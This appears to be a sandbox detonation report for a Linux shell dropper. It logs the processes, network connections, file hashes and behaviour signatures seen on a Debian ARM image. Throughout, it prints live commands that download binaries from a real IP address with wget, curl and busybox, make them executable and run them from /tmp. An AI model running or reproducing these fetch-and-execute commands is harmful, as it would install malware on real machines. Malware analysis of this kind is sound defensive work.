[rm 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/usr/bin/wget

[wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/bin/chmod

[chmod 777 U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC

[./U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/bin/rm

[rm U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/usr/bin/wget

[wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/bin/chmod

[chmod 777 vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz

[./vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/bin/rm

[rm vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/usr/bin/wget

[wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/bin/chmod

[chmod 777 zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6

[./zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/bin/rm

[rm zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/usr/bin/wget

[wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/bin/chmod

[chmod 777 idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV

[./idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/bin/rm

[rm idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/usr/bin/wget

[wget http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/bin/chmod

[chmod 777 p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783

[./p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/bin/rm

[rm p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/usr/bin/wget

[wget http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/bin/chmod

[chmod 777 me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17

[./me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/bin/rm

[rm me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/usr/bin/wget

[wget http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/bin/chmod

[chmod 777 GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF

[./GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/bin/rm

[rm GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/usr/bin/wget

[wget http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/bin/chmod

[chmod 777 JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug

[./JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/bin/rm

[rm JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/usr/bin/wget

[wget http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/bin/chmod

[chmod 777 GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF

[./GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/bin/rm

[rm GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/usr/bin/wget

[wget http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/bin/chmod

[chmod 777 JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug

[./JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/bin/rm

[rm JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]

/usr/bin/wget

[wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/bin/chmod

[chmod 777 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2

[./25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/bin/rm

[rm 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/usr/bin/wget

[wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/bin/chmod

[chmod 777 UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5

[./UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/bin/rm

[rm UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/usr/bin/wget

[wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/bin/chmod

[chmod 777 Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX

[./Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/bin/rm

[rm Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/usr/bin/wget

[wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/bin/chmod

[chmod 777 kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW

[./kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/bin/rm

[rm kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/usr/bin/wget

[wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/bin/chmod

[chmod 777 l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI

[./l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/bin/rm

[rm l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/usr/bin/wget

[wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/bin/chmod

[chmod 777 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE

[./6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/bin/rm

[rm 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/usr/bin/wget

[wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/bin/chmod

[chmod 777 U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC

[./U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/bin/rm

[rm U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/usr/bin/wget

[wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/bin/chmod

[chmod 777 vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz

[./vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/bin/rm

[rm vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/usr/bin/wget

[wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/bin/chmod

[chmod 777 zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6

[./zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/bin/rm

[rm zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/usr/bin/wget

[wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/bin/chmod

[chmod 777 idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV

[./idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/bin/rm

[rm idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/usr/bin/wget

[wget http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/bin/chmod

[chmod 777 p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783

[./p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/bin/rm

[rm p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/usr/bin/wget

[wget http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/bin/chmod

[chmod 777 me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17

[./me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/bin/rm

[rm me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 151.101.1.91:443 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
GB 195.181.164.14:443 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-20 02:45

Reported

2024-11-20 02:48

Platform

debian9-armhf-20240611-en

Max time kernel

30s

Max time network

34s

Command Line

[/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 N/A
N/A /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 N/A
N/A /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX N/A
N/A /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW N/A
N/A /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI N/A
N/A /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE N/A
N/A /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC N/A
N/A /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz N/A
N/A /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC /usr/bin/curl N/A
File opened for modification /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 /usr/bin/curl N/A
File opened for modification /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 /usr/bin/curl N/A
File opened for modification /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX /usr/bin/curl N/A
File opened for modification /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW /usr/bin/curl N/A
File opened for modification /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE /usr/bin/curl N/A
File opened for modification /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI /usr/bin/curl N/A
File opened for modification /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz /usr/bin/curl N/A
File opened for modification /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 /usr/bin/curl N/A

Processes

/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh

[/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/bin/chmod

[chmod 777 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2

[./25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/bin/rm

[rm 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/usr/bin/wget

[wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/bin/chmod

[chmod 777 UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5

[./UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/bin/rm

[rm UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/usr/bin/wget

[wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/bin/chmod

[chmod 777 Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX

[./Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/bin/rm

[rm Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/usr/bin/wget

[wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/bin/chmod

[chmod 777 kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW

[./kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/bin/rm

[rm kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/usr/bin/wget

[wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/bin/chmod

[chmod 777 l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI

[./l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/bin/rm

[rm l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/usr/bin/wget

[wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/bin/busybox

